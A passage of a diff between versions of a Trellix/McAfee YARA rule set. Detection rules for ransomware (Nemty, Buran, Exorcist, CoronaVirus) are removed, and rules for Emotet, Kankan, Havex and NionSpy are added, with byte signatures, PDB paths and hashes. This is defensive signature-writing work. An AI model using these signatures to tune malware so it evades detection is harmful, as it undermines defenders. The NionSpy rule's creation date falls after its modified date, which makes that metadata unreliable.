-		$s9 = "rfyPvccxgVaLvW9OOY2J090Mq987N9lif/RoIDP89luS9Ouv9gUImpgCTVGWvJzrqiS8hQ5El02LdEvKcJ+7dn3DxiXSNG1PwLrY59KzGs/gUvXnYcmT6t34qfZmr8g8" ascii
-		$s10 = "IO.SYS" fullword wide
-		$s11 = "QgzjKXcD1Jh/cOLBh1OMb+rWxUbToys2ArG9laNWAWk0rNIv2dnIDpc+mSbp91E8qVN8Mv8K5jC3EBr4TB8jh5Ns/onBhPZ9rLXR7wIkaXGeTZi/4/XOtO3DFiad4+vf" ascii
-		$s12 = "NEMTY-DECRYPT.txt" fullword wide
-		$s13 = "pvXmjPQRoUmjj0g9QZ24wvEqyvcJVvFWXc0LL2XL5DWmz8me5wElh/48FHKcpbnq8C2kwQ==" fullword ascii
-		$s14 = "a/QRAGlNLvqNuONkUWCQTNfoW45DFkZVjUPn0t3tJQnHWPhJR2HWttXqYpQQIMpn" fullword ascii
-		$s15 = "KeoJrLFoTgXaTKTIr+v/ObwtC5BKtMitXq8aaDT8apz98QQvQgMbncLSJWJG+bHvaMhG" fullword ascii
-		$s16 = "pu/hj6YerUnqlUM9A8i+i/UhnvsIE+9XTYs=" fullword ascii
-		$s17 = "grQkLxaGvL0IBGGCRlJ8Q4qQP/midozZSBhFGEDpNElwvWXhba6kTH1LoX8VYNOCZTDzLe82kUD1TSAoZ/fz+8QN7pLqol5+f9QnCLB9QKOi0OmpIS1DLlngr9YH99vt" ascii
-		$s18 = "BOOTSECT.BAK" fullword wide
-		$s19 = "bbVU/9TycwPO+5MgkokSHkAbUSRTwcbYy5tmDXAU1lcF7d36BTpfvzaV5/VI6ARRt2ypsxHGlnOJQUTH6Ya//Eu0jPi/6s2MmOk67csw/msiaaxuHXDostsSCC+kolVX" ascii
-		$s20 = "puh4wXjVYWJzFN6aIgnClL4W/1/5Eg6bm5uEv6Dru0pfOvhmbF1SY3zav4RQVQTYMfZxAsaBYfJ+Gx+6gDEmKggypl1VcVXWRbxAuDIXaByh9aP4B2QvhLnJxZLe+AG5" ascii
+		$pdb = "\\c0da\\j.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) and 4 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and any of them
 }
-rule TRELLIX_ARC_Nemty_Ransomware_2_6 : RANSOMWARE FILE
+rule TRELLIX_ARC_MALW_Emotet : FINANCIAL FILE
 {
 	meta:
-		description = "Rule to detect Nemty Ransomware version 2.6"
+		description = "Rule to detect unpacked Emotet"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "335dff33-d078-58ba-b68b-a949895b710f"
-		date = "2020-04-06"
+		id = "5bc83065-dfdd-56b7-9983-200bff35c8b1"
+		date = "2020-07-21"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Nemty.yar#L47-L80"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_emotet.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "52b7d20d358d1774a360bb3897a889e14d416c3b2dff26156a506ff199c3388d"
-		logic_hash = "dacf709838ef2ef65d25bdbbd92007ab46a95953031d7bee75eac046f670171a"
+		logic_hash = "223e4453a6c3b56b0bc0f91147fa55ea59582d64b8a5c08f1f8d06026044065e"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "FINANCIAL, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nemty"
+		malware_type = "financial"
+		malware_family = "Backdoor:W32/Emotet"
+		actor_type = "Cybercrime"
+		hash1 = "a6621c093047446e0e8ae104769af93a5a8ed147ab8865afaafbbd22adbd052d"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????A1????????33??89????8B????578D??????????89??????????E8????????33??6A??5839????76??5683????75??508D????5350E8????????8D??????????508D????E8????????83????6A??5880??????75??C6??????4879??EB??FE????33??8A??????8B??????????30????47403B????72??5E8B????33??5FE8????????C9C3558B??51515333??5633??32??89????39????0F86????????578B????8B????8A????8B??83????74??4F74??4F75??21????0FB6??0FB6??83????8B??C1????C1????0B??8A??????????83????88????8A??????????8B????88??????83????EB??0FB6??0FB6??83????6A??C1????C1????5E0B??EB??33??0FB6??46C1????8A??????????88????40FF????8A??8B????3B????72??5F4E74??4E75??0FB6??83????8A????????????88????C6????????83????EB??0FB6??83????C1????8A??????????88????66????????????83????5EC6??????5BC9C3558B??33??F6??????75??5733??39????76??8B????8A????80????74??80????7C??80????7F??0FB6??8A??????????80????74??8B??83????83????74??4A74??4A74??4A75??08????40EB??8A??C0????80????08????40C0????EB??8A??C0????80????08????40C0????EB??C0????88????473B????72??EB??33??5F5DC3558B??518B??85??74??8B????568B??89????3B??74??576A??33??E8????????83????3B????75??5FFF??E8????????595E33??89??89????89????C9C3558B??80??????74??83??????72??538B??85??74??575356E8????????83????53E8????????595BC7????????????89????C6??????5DC2????C7??????????E9????????558B??568B??C7??????????E8????????F6??????74??56E8????????598B??5E5DC2????558B??83????81??????????A1????????33??89????????????5356578D????508D??????E8????????68????????8D????????????E8????????6A??5F33??83????66????????8D????8B??33??5089??????89??????E8????????E8????????33??66????????8B????????????03??????83????8D??????89??????89??????E8????????538D??????5083????8D??????E8????????538D????????????5083????E8????????8B??8D??????E8????????6A??33??E8????????83????????8B??????73??8D??????8D????????????5150FF??????????89??????83????0F84????????8B??????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????F6??????????????8D????????????508D??????8D??????74??E8????????598D??????51E8????????8B??598D??????E8????????6A??33??8D??????E8????????6A??8D??????E8????????83????8D??????8B??50E8????????E8????????83????E9????????E8????????8B??598D??????E8????????6A??33??8D??????E8????????8D????????????50FF??????????508D??????E8????????8B??????6A??5F39??????73??8D??????8B??????????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??74??8B??????39??????73??8D??????68????????50FF??85??74??83????8B??68????????E8????????83????8D????????????8B??51E8????????E8????????83????85??75??8B??????39??????73??8D??????83????8B??51E8????????E8????????83????6A??33??8D??????E8????????8D????????????50FF??????FF??????????85??0F85????????FF??????FF??????????33??435333??8D?????? }
+		$pattern_0 = { 8b45fc 8be5 5d c3 55 8bec }
+		$pattern_1 = { 3c39 7e13 3c61 7c04 3c7a 7e0b 3c41 }
+		$pattern_2 = { 7c04 3c39 7e13 3c61 7c04 3c7a 7e0b }
+		$pattern_3 = { 5f 8bc6 5e 5b 8be5 }
+		$pattern_4 = { 5f 668906 5e 5b }
+		$pattern_5 = { 3c30 7c04 3c39 7e13 3c61 7c04 }
+		$pattern_6 = { 53 56 57 8bfa 8bf1 }
+		$pattern_7 = { 3c39 7e13 3c61 7c04 3c7a 7e0b }
+		$pattern_8 = { 55 8bec 83ec14 53 }
+		$pattern_9 = { 5e 8be5 5d c3 55 8bec }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1500KB and $pattern
+		7 of them and filesize < 180224
 }
-rule TRELLIX_ARC_Buran_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Backdoor_Kankan_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Buran ransomware"
+		description = "Rule to detect kankan PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b96c0e5c-dce2-559d-9623-81e8a9a322f2"
-		date = "2019-11-05"
+		id = "6910ecc7-3c31-569b-a7ff-2dcbccff88f9"
+		date = "2013-08-01"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Buran.yar#L1-L27"
+		reference = "https://threatpoint.checkpoint.com/ThreatPortal/threat?threatType=malwarefamily&threatId=650"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_kankan_pdb.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "056cf2e6aca22876fb8bfafc14a3be0e42124a26edab42a6f7a928c87fb8fff4"
+		hash = "73f9e28d2616ee990762ab8e0a280d513f499a5ab2cae9f8cf467701f810b98a"
+		logic_hash = "3d2e45631dfca0e76e98eee4bb5c4ce1631906f497c052d8c41cc37637cb2760"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Buran"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Kankan"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 5? 8B ?? 81 C? ?? ?? ?? ?? 5? 5? 5? 33 ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? C6 ?? ?? ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 8D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? E8 ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 84 ?? 0F 85 }
-		$s2 = { 4? 33 ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? 8B ?? FF 5? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? E8 ?? ?? ?? ?? 85 ?? 74 }
-		$s3 = { A1 ?? ?? ?? ?? 99 5? 5? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 03 ?? ?? ?? 13 ?? ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 4? 99 89 ?? ?? 89 ?? ?? FF 7? ?? FF 7? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 3B ?? ?? 75 }
-		$s4 = { 5? 5? 5? 5? 8B ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 68 ?? ?? ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 89 ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? ?? 0F 84 }
-		$s5 = { 5? 8B ?? 83 ?? ?? 5? 5? 5? 89 ?? ?? 8B ?? 89 ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 83 ?? ?? 83 ?? ?? 5? 5? A1 ?? ?? ?? ?? 99 E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? 8B ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 2B ?? 8B ?? 4? 5? 8B ?? ?? 8B ?? 83 ?? ?? B9 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 83 ?? ?? 0F 8C }
+		$pdb = "\\Projects\\OfficeAddin\\INPEnhSvc\\Release\\INPEnhSvc.pdb"
+		$pdb1 = "\\Projects\\OfficeAddin\\OfficeAddin\\Release\\INPEn.pdb"
+		$pdb2 = "\\Projects\\OfficeAddinXJ\\VOCEnhUD\\Release\\VOCEnhUD.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
 }
-rule TRELLIX_ARC_RANSOM_Exorcist : RANSOMWARE FILE
+rule TRELLIX_ARC_Havex_Backdoor_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Exorcist"
-		author = "McAfee ATR Team"
-		id = "38ab069d-b030-5459-a42f-7ecd5963e68f"
-		date = "2020-09-01"
-		modified = "2020-10-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Exorcist.yar#L1-L25"
+		description = "Rule to detect backdoor Havex based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "a667bb4e-8c38-59a6-8ae0-09c44961a687"
+		date = "2012-11-17"
+		modified = "2020-08-14"
+		reference = "https://www.f-secure.com/v-descs/backdoor_w32_havex.shtml"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_havex_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "c376382e60aae0f661151495097d3d93f185faebb11781dbf083324c23a07247"
+		hash = "0f4046be5de15727e8ac786e54ad7230807d26ef86c3e8c0e997ea76ab3de255"
+		logic_hash = "dc50475b1ff2194306a0295f71860e4cc5ae7e126daa5d401b98cd2a0aadf1dd"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/Exorcist"
-		actor_type = "Cybercrime"
-		hash1 = "793dcc731fa2c6f7406fd52c7ac43926ac23e39badce09677128cce0192e19b0"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Havex"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$sq1 = { 48 8B C4 48 89 58 08 48 89 70 10 48 89 78 18 4C 89 60 20 55 41 56 41 57 48 8D 68 A1 48 81 EC 90 00 00 00 49 8B F1 49 8B F8 4C 8B FA 48 8B D9 E8 ?? ?? ?? ?? 45 33 E4 85 C0 0F 85 B1 00 00 00 48 8B D7 48 8B CB E8 9E 02 00 00 85 C0 0F 85 9E 00 00 00 33 D2 48 8B CB E8 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 45 8D 44 24 01 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB 48 8B F8 FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 E8 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 4C 8B F0 48 8D 48 FF 48 83 F9 FD 77 25 48 8D 55 2F 48 8B C8 FF 15 ?? ?? ?? ?? 4C 39 65 2F 75 3B 49 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 4C 8D 9C 24 90 00 00 00 49 8B 5B 20 49 8B 73 28 49 8B 7B 30 4D 8B 63 38 49 8B E3 41 5F 41 5E 5D C3 48 8D 45 FB 4C 89 65 1F 4C 8D 4D FF 48 89 44 24 20 4C 8B C6 4C 89 65 07 48 8D 55 07 4C 89 65 FF 48 8D 4D 1F 44 89 65 FB E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 3C F5 FF FF 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 8D 55 17 49 8B CE FF 15 ?? ?? ?? ?? 49 8B CE 44 89 65 F7 E8 ?? ?? ?? ?? 49 8B F4 4C 89 65 0F 4C 39 65 17 0F 8E 9D 00 00 00 C1 E0 10 44 8B F8 F0 FF 45 F7 B9 50 00 00 00 E8 ?? ?? ?? ?? 8B 4D 13 48 8B D8 89 48 14 89 70 10 4C 89 60 18 44 89 60 28 4C 89 70 30 48 8B 4D 07 48 89 48 48 48 8D 45 F7 B9 00 00 01 00 48 89 43 40 E8 ?? ?? ?? ?? 33 D2 48 89 43 20 41 B8 00 00 01 00 48 8B C8 E8 ?? ?? ?? ?? 48 8B 53 20 4C 8D 4B 38 41 B8 00 00 01 00 48 89 5C 24 20 49 8B CE FF 15 ?? ?? ?? ?? EB 08 33 C9 FF 15 ?? ?? ?? ?? 8B 45 F7 3D E8 03 00 00 77 EE 49 03 F7 48 89 75 0F 48 3B 75 17 0F 8C 6B FF FF FF EB 03 8B 45 F7 85 C0 74 0E 33 C9 FF 15 ?? ?? ?? ?? 44 39 65 F7 77 F2 48 8B 4D 07 E8 ?? ?? ?? ?? 48 8B 4D 1F 33 D2 E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 00 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 8D 48 FF 48 83 F9 FD 77 51 48 8D 55 37 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 37 45 33 C9 45 33 C0 48 8B CB FF 15 ?? ?? ?? ?? 44 8B 45 FB 4C 8D 4D 27 48 8B 55 FF 48 8B CB 4C 89 64 24 20 FF 15 ?? ?? ?? ?? 48 8B 4D FF E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? E9 14 FE FF FF 48 8B CF E8 ?? ?? ?? ?? 48 8B 4D FF E9 06 FE FF FF }
-		$sq2 = { 48 8B C4 48 81 EC 38 01 00 00 48 8D 50 08 C7 40 08 04 01 00 00 48 8D 4C 24 20 FF 15 ?? ?? ?? ?? 48 8D 4C 24 20 E8 ?? ?? ?? ?? 48 81 C4 38 01 00 00 C3 }
+		$pdb = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Phalanx-3d.ServerAgent.pdb"
+		$pdb1 = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Tmprovider.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
 }
-rule TRELLIX_ARC_Installer_Coronavirus : RANSOMWARE FILE
+rule TRELLIX_ARC_Nionspy : FILEINFECTOR FILE
 {
 	meta:
-		description = "Rule to detect the Corona Virus Installer"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "2a224529-bfc7-57ed-91c3-426cae4b7895"
-		date = "2020-03-25"
+		description = "Triggers on old and new variants of W32/NionSpy file infector"
+		author = "Trellix ARC Team"
+		id = "86051ef8-a18b-553c-b06c-490f8d6df5cf"
+		date = "2025-06-01"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_coronavirus.yar#L1-L41"
+		reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_NionSpy.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5987a6e42c3412086b7c9067dc25f1aaa659b2b123581899e9df92cb7907a3ed"
-		logic_hash = "26be8bbfbf615967cc2a0e2d4179cd5f444c53f170a681d2ec236244881dc629"
+		logic_hash = "982ba52f39352aee9e2d2dcadfb0816c439e92d0e5947afa7860630720913742"
 		score = 75
-		quality = 62
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/CoronaVirus"
+		quality = 70
+		tags = "FILEINFECTOR, FILE"
+		malware_type = "fileinfector"
+		malware_family = "FileInfector:W32/NionSpy"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 61 63 68 65 6C 6C 69 65 73 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D }
-		$s2 = { 74 6F 6A 65 6E 2E 6D 65 40 67 6D 61 69 6C 2E 63 6F 6D }
-		$s4 = { 77 61 6E 67 63 68 79 7A 40 67 6D 61 69 6C 2E 63 6F 6D }
-		$s5 = { 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 74 00 69 00 70 00 6F 00 73 00 20 00 64 00 65 00 20 00 69 00 6D 00 61 00 67 00 65 00 6E 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 3B 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 77 00 6D 00 66 00 7C 00 4D 00 61 00 70 00 61 00 73 00 20 00 64 00 65 00 20 00 62 00 69 00 74 00 73 00 20 00 28 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 29 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 7C 00 49 00 63 00 6F 00 6E 00 6F 00 73 00 2F 00 63 00 75 00 72 00 73 00 6F 00 72 00 65 00 73 00 20 00 28 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 29 00 7C 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 7C 00 4D 00 65 00 74 00 61 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 29 00 7C 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 7C 00 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 2A 00 29 00 7C 00 2A 00 2E 00 2A 00 7C 00 7C 00 }
-		$s6 = { 48 00 54 00 4D 00 4C 00 5F 00 49 00 4D 00 47 00 23 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 4C 00 49 00 5F 00 43 00 41 00 50 00 54 00 49 00 4F 00 4E 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 29 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 53 00 42 00 5F 00 48 00 5F 00 53 00 43 00 52 00 4F 00 4C 00 4C 00 5F 00 50 00 52 00 45 00 56 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 31 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 4F 00 52 00 41 00 4E 00 47 00 45 